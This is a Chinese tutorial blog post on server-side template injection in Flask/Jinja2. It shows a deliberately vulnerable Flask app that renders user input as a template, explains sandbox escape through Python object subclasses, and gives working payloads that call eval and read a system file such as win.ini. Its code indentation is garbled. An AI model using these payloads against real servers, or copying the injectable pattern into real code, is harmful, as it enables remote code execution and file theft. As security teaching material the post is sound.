当前位置 博文首页 > 文章内容

    SSTI注入绕过

    作者: 栏目:未分类 时间:2020-08-23 18:01:17

    本站于2023年9月4日。收到“大连君*****咨询有限公司”通知
    说我们IIS7站长博客,有一篇博文用了他们的图片。
    要求我们给他们一张图片6000元。要不然法院告我们

    为避免不必要的麻烦,IIS7站长博客,全站内容图片下架、并积极应诉
    博文内容全部不再显示,请需要相关资讯的站长朋友到必应搜索。谢谢!

    另祝:版权碰瓷诈骗团伙,早日弃暗投明。

    相关新闻:借版权之名、行诈骗之实,周某因犯诈骗罪被判处有期徒刑十一年六个月

    叹!百花齐放的时代,渐行渐远!



    SSTI(Server-Side Template Injection),即服务端模板注入攻击。

    实例:

    from flask import Flask, request
    from jinja2 import Template
    app = Flask(__name__)
    @app.route("/")
    def index():    
    name = request.args.get('name', 'guest')    
    	t = Template("Hello " + name)             # 创建模板    	return t.render()                         # 渲染
    if __name__ == "__main__":    
    	app.run();     # 启动 flask ,默认 5000 端口
    

    变量取值 {{ }} 是一种特殊的占位符。当利用jinja2进行渲染的时候,它会把这些特殊的占位符进行填充/替换,并执行。

    jinja2 语法的模板解释器删除了大部分敏感函数,相当于构建了一个沙箱环境。但是一些内置函数和属性还是依然可以使用,而Flask的SSTI就是利用这些内置函数和属性相互组建来达到调用函数的目的,从而绕过沙箱。

    Object类

    object是python的默认类,有很多的方法,python种默认的list,str,dict等等都是继承了object类的方法。

    在python3种默认都是新式类,也即是所有的自定义类,基类都会继承object类。

    如何获取Object类:

    ().__class__.__mro__

    __mro__方法来获取这个类的调用顺序

    ().__class__.__mro__[1]

    包含敏感函数的子类

    获取子类的方法:__subclasses__()

    查看object中的所有子类:

    ().__class__.__mro__[1].__subclasses__()

    寻找含有eval属性方法的子类:

    i = 0
    for c in ().__class__.__base__.__subclasses__():
        if hasattr(c,'__init__') and hasattr(c.__init__,'__globals__') and c.__init__.__globals__['__builtins__'] and c.__init__.__globals__['__builtins__'][code]:
            print('{} {}'.format(i,c))
        i = i + 1
    

    查看其中属性:

    name={{().__class__.__base__.__subclasses__()[80].__init__.__globals__['__builtins__']}}
    

    绕过执行:

    name={{().__class__.__base__.__subclasses__()[80].__init__.__globals__['__builtins__']['eval']('abs(-1)')}}
    

    其他姿势

    jinja2的沙箱环境和python的运行环境有很大的不同,如果碰到未定义的变量就会返回为Undefined类型。

    既然都是Undefined那我随便定义一个未被定义过的变量也应该是Undefined:

    name={{a.__init__.__globals__.__builtins__}}
    

    payload:

    {{a.__init__.__globals__.__builtins__.open("C:\Windows\win.ini").read()}}
    

    reference:

    https://www.cnblogs.com/zaqzzz/p/10263396.html